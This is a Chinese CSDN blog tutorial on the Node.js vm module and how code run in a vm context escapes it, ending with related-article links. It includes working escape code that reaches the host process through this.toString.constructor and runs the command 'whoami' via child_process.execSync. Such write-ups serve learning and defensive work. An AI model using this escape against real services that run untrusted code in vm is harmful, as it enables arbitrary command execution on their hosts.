Nodejs沙箱逃逸

最新推荐文章于 2024-07-10 17:18:35 发布
最新推荐文章于 2024-07-10 17:18:35 发布
阅读量100 收藏
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55822200/article/details/132073750
版权

文章目录

Nodejs沙箱逃逸

沙箱是什么?

沙箱是一种按照安全策略限制程序行为的执行环境。早期主要用于测试可疑软件等,比如黑客们为了试用某种病毒或者不安全产品,往往可以将它们在沙箱环境中运行。

经典的沙箱系统的实现途径一般是通过拦截系统调用,监视程序行为,然后依据用户定义的策略来控制和限制程序对计算机资源的使用,比如改写注册表,读写磁盘等。

VM模块

VM模块是NodeJs内置的一个模块,在一定程度上,它只是一个隔离环境,并不是一个沙箱。

VM模块是NodeJS里面的核心模块,支撑了require方法和NodeJS的运行机制。

VM包含了三个常用的方法,来用于创建独立运行的沙箱体制。

vm.runInThisContext(code, filename)

1)此方法用于创建一个独立的沙箱运行空间,code内的代码可以访问外部的global对象,但是不能访问其他变量。code内部global与外部共享。

var vm = require("vm");

var p = 5;
global.p = 11;

vm.runInThisContext("console.log('ok', p)");// 显示global下的11
vm.runInThisContext("console.log(global)"); // 显示global

console.log(p);// 显示5
vm.runInContext(code, sandBox);

2)此方法用于创建一个独立的沙箱运行空间,sandBox将做为global的变量传入code内,但是不存在global变量,sandBox要求的是vm.createContext()方法创建的sandBox。

var vm = require("vm");
var util = require("util");

var window = {
p: 2,
vm: vm,
console: console,
require: require
};

var p = 5;

global.p = 11;

vm.createContext(window);
vm.runInContext('p = 3;console.log(typeof global);', window); // global是undefined

console.log(window.p);// 被改变为3

console.log(util.inspect(window));
vm.runInNewContext(code, sandbox, opt);

3)这个方法与runInContext一样,但是少了创建sandBox的步骤

沙箱逃逸

先试一下一个小实验

const vm = require('vm');
const script = `m + n`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

执行m+n表达式

在这里插入图片描述

可以看到这个隔离环境是很容易绕过并执行的。

这个环境里有三个对象

this 指向传给vm.createContext的那个对象 
m 等于数字1 
n 等于数字2

我们可以利用外部传入的对象来绕过这个隔离环境。例如利用this来引入当前上下文里没有的模块

this.toString.constructor('return process')()
const process = this.toString.constructor('return process')() process.mainModule.require('child_process').execSync('whoami').toString()

第一行的this.toString可以获取到一个函数对象,this.toString.constructor获取到函数对象的构造器,构造器中可以传入字符串类型的代码。然后执行,就可以获得process对象了。

而第二行,就是利用前面获取的process对象来干任何事情。

那么,就有人说了,为什么不直接使用{}.toString.constructor(‘return process’)(),这样岂不是更直接了当?

this与{}的一个区别就是,{}是在沙箱里的一个对象,而this是在沙箱外的对象。

那么m和n也是沙箱外的对象,为什么不能用m.toString.constructor(‘return process’)()呢?

因为数字,字符串,布尔等类型都是primitive types,它们传递的只是一个值,并不是一个引用。所以使用后的m与外部的m是不一样的。

所以,修改成context:{m: [], n: {}, x: /regexp/},这样m、n、x就都可以利用了。

const inspect = require('util').inspect;
const vm = require('vm');
const script = new vm.Script(
	`(e => {
		const process = x.toString.constructor('return process')()
		return process.mainModule.require('child_process').execSync('whoami').toString()
	})()`
	);
const sandbox = {m:[], n: {}, x: /regexp/};
const context = new vm.createContext(sandbox);
const res = script.runInContext(context);
console.log(res)

所以,我们在沙箱内部找到一个沙箱外的对象,并借助这个对象的属性来获取沙箱外的函数,以此来绕过沙箱。

在这里插入图片描述

尘幽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nodejs-沙箱
03-04
参考: : Nodejs沙箱安装打开cmd并输入'node -v'来检查您的计算机是否安装了nodejs。 如果不是,请在这里下载并安装Node js。运行节点程序转到您的项目目录,并在cmd中写入节点{ur_js_fileName}创建服务器并侦听请求...
Noder-简单的基于Docker的NodeJS沙箱
08-10
Noder -简单的,基于Docker的NodeJS沙箱。用于测试代码并包含一个编辑器
Node.js VM模块
司马懿的西山居
09-29 7268
vm模块在V8虚拟机上下文中提供了编译和运行代码的API
Node:深入模块机制
yivisir的博客
08-03 525
NodeJS:深入模块机制 1. CommonJS规范 CommonJS(http://www.commonjs.org)规范的出现,其目标是为了构建JavaScript在包括Web服务器,桌面,命令行工具,及浏览器方面的生态系统。CommonJS其实不是一门新的语言,甚至都不能说它是一个新的解释器——实际上它只是一个概念或者是一个规范。 它具体弥补了前端JavaScript 的哪些空白呢?其实这也涉及了很多前端JavaScript 所没有涉及的东西,如二进制、编码、IO、文件、系统、断言测试、套接
node的vm(虚拟机),改变运行的环境
longtengg1的博客
05-08 1195
vm文档 node文档中对vm的解释是: vm 模块提供了一系列 API 用于在 V8 虚拟机环境中编译和运行代码。 JavaScript 代码可以被编译并立即运行,也可以编译、保存然后再运行。 同时node文档中提醒: vm模块并不是实现代码安全性的一套机制。 绝不要试图用其运行未经信任的代码. vm模块允许改变一些JavaScript脚本代码的上下文运行环境。但是这些代码仍然是运行在nodejs应用程序的当前进程中。从这个角度来说,vm的功能有些类似于eval函数,但是vm模块提供了一些eval函数所不
node基础1runInThisContext == eval
gwdgwd123的博客
06-23 996
let path = require('path') path.resolve(__dirname,'./1.start.js') // 把路径转化成绝对路径 当前文件夹 path.join(__dirname,'./1.start.js') path.resolve(__dirname,'./1.start.js','/') 回到磁盘根 path.join(__dirname,'./1....
安全基础 --- nodejs沙箱逃逸
weixin_62443409的博客
09-22 4263
因为 primitive types,数字、字符串、布尔这些都是 primitive types ,他们传递的是值,沙盒内使用的m和外部的m不是同一个m,无法利用。{} 是在沙盒内部的一个对象,而this是在沙盒外的对象(注入进来的)。沙盒内的 {} 无法获取process,因为其本身就无process。vm模块式nodejs中内置的模块,是nodejs提供给使用者的隔离环境。来引入当前上下文里没有的模块,绕过这个隔离环境。
nodejs沙箱逃逸漏洞
weixin_52635036的博客
08-05 294
这个原因就是因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的。如果是值引用,外部的m和n和沙盒内部的mn是两个数据,如果是类型引用,那就是外部的m把内存地址传给内部,内部直接调用外部的内存地址,那这俩就是一样的。只要我们能在沙箱内部,找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱
NodeJS VM沙箱逃逸
rev1ve的博客
10-22 558
什么是沙箱(sandbox)当我们运行一些可能会产生危害的程序,我们不能直接在主机的真实环境上进行测试,所以可以通过单独开辟一个运行代码的环境,它与主机相互隔离,但使用主机的硬件资源,我们将有危害的代码在沙箱中运行只会对沙箱内部产生一些影响,而不会影响到主机上的功能,沙箱的工作机制主要是依靠重定向,将恶意代码的执行目标重定向到沙箱内部。我们都知道函数内和函数外是两个作用域,不过当在函数中的作用域想要使用函数外的变量时,要通过形参来传递,当参数过多时这种方法就变的麻烦起来了。
Nodejs沙箱逃逸--总结
m0_68976043的博客
08-19 3118
每一个包都有一个自己的上下文,包之间的作用域是互相隔离不互通的,也就是说就算我在y1.js中require了y2.js,那么我在y1.js中也无法直接调用y2.js中的变量和函数,举个例子。在Web端(浏览器),发挥作用的一般是JavaScript,学过JavaScript的师傅应该都知道我们打开浏览器的窗口是JavaScript中最大的对象。我们都知道函数内和函数外是两个作用域,不过当在函数中的作用域想要使用函数外的变量时,要通过形参来传递,当参数过多时这种方法就变的麻烦起来了。
Nodejs沙箱绕过
qq_68163788的博客
11-10 1265
Node.js沙箱逃逸是指攻击者通过利用Node.js沙箱中的漏洞,成功地从沙箱环境中逃脱,并在主机上执行恶意代码。这种攻击方式通常是通过利用Node.js沙箱中的一些不安全的API或者漏洞来实现的。 例如,攻击者可以通过在Node.js沙箱中使用eval()函数来执行任意的JavaScript代码,从而逃脱沙箱环境。另外,攻击者还可以利用Node.js沙箱中的child_process模块来执行系统命令,从而获取系统权限。 为了防止Node.js沙箱逃逸攻击,开发人员应该遵循安全编程规范,并使用最新版本
sandbox:用于随机事物的 NodeJS 沙箱
06-29
在这个场景下,"sandbox:用于随机事物的 NodeJS 沙箱" 可能是指一个项目,这个项目创建了一个 Node.js 的沙箱环境,用于测试、实验或处理不确定来源的 JavaScript 代码。 首先,我们来深入了解一下 Node.js 的沙箱...
Address-Book-API:托管示例地址簿 RESTful API 的 NodeJS 沙箱存储库
06-21
地址簿API 使用准系统 Node.js 应用程序。 此应用程序扩展了如文章中所述 - 请查看。 在本地运行 确保你已经安装了和 。 ...$ cd address-book-api $ npm install ... 您的应用程序现在应该在上运行。...
NodeJS+Vue实现支付宝支付(沙箱)完整流程 .zip
05-12
在本文中,我们将深入探讨如何使用NodeJS和Vue.js实现在沙箱环境中集成支付宝支付的完整流程。这个项目涉及的主要知识点包括NodeJS后端开发、Vue.js前端开发以及支付宝开放平台的API接口调用。 首先,我们需要理解...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1113
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
最新发布
TSINGSEE青犀视频官方技术博客
07-10 1145
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 808
系统的外部可观察行为和物理特征
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 513
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
nodejs沙箱逃逸
09-11
node.js沙箱逃逸是指攻击者利用特定的漏洞或技术手段,成功越过node.js沙箱限制,实现对主机环境的非法操作或访问。在node.js中,沙箱被用来隔离有害程序,防止其影响到主机环境。通过沙箱,可以将程序与程序之间、程序与主机之间互相分隔开。 具体来说,沙箱逃逸利用的是node.js中的漏洞或不当的配置,使攻击者能够绕过沙箱的限制,执行恶意代码或访问敏感资源。攻击者可能通过构造精心设计的输入,触发沙箱漏洞,从而获得对主机环境的不受限制的访问权限。 为了防止沙箱逃逸,需要及时更新node.js版本,以修复已知的漏洞。此外,也可以采取其他安全措施,如限制代码的执行权限,限制访问敏感资源的权限等。同时,编写安全的代码也是非常重要的,避免在代码中存在漏洞可供攻击者利用。 总结来说,node.js沙箱逃逸是指攻击者利用漏洞或技术手段,成功绕过node.js的沙箱限制,实现对主机环境的非法操作或访问。为了防止沙箱逃逸,需要及时更新node.js版本,采取其他安全措施,并编写安全的代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值